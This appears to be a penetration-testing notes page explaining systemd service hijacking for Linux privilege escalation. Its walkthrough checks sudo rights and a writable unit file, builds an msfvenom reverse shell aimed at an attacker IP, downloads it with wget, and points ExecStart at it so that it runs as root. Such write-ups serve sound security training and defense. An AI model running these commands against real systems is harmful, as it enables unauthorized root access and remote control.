Service Hijacking

Service hijacking is a privilege escalation technique that targets misconfigured or weakly protected systemd service units. When a low-privileged user is allowed to reload or restart a service running as root, and has control over the unit file or any executable referenced by it, arbitrary code execution as root becomes possible.

This scenario commonly arises when service unit files or scripts are world-writable or owned by the user but executed with elevated privileges. Hijacking a service involves modifying either the service configuration or its executable to trigger payload execution during a systemctl restart.

# Check user's permissions
$ sudo -l

User x7331 may run the following commands on kali:
    (ALL) NOPASSWD: /bin/systemctl restart backup.service
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) !/bin/bash, !/bin/sh, !/bin/su, !/usr/bin/sudo

# Check the service's status and the service file path
$ systemctl status backup.service

 backup.service - Backup Service
     Loaded: loaded (/etc/systemd/system/backup.service; enabled; preset: enabled)
     Active: inactive (dead)
     
# Check the service file's permissions
$ ls -la /etc/systemd/system/backup.service
-rw-rw-r-- 1 x7331 x7331 193 Apr 14 17:53 /etc/systemd/system/backup.service

# Review the contents of the file
$ cat /etc/systemd/system/backup.service

[Unit]
Description=Backup Service
<SNIP>

[Service]
Type=simple
ExecStart=/usr/local/bin/backup.sh # This is not writable
User=root
Group=root
<SNIP>
# Create a reverse shell payload targeting 64-bit Linux on the attacking host
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=80 -f elf -o revshell.elf
# Download the payload to the target machine
$ wget http://192.168.45.170/revshell.elf

# Make the payload executable
$ chmod +x revshell.elf

# Modify the service unit with malicious ExecStart
x7331@kali:~$ cat /etc/systemd/system/backup.service

<SNIP>
[Service]
Type=simple
#ExecStart=/usr/local/bin/backup.sh
ExecStart=/home/x7331/revshell.elf
User=root
Group=root
<SNIP>

# Reload systemd configuration to apply the changes
$ sudo /bin/systemctl daemon-reload

# Restart the modified service, which now runs the reverse shell payload
$ sudo /bin/systemctl restart backup.service
PreviousServicesNextrpc.py

Last updated

Was this helpful?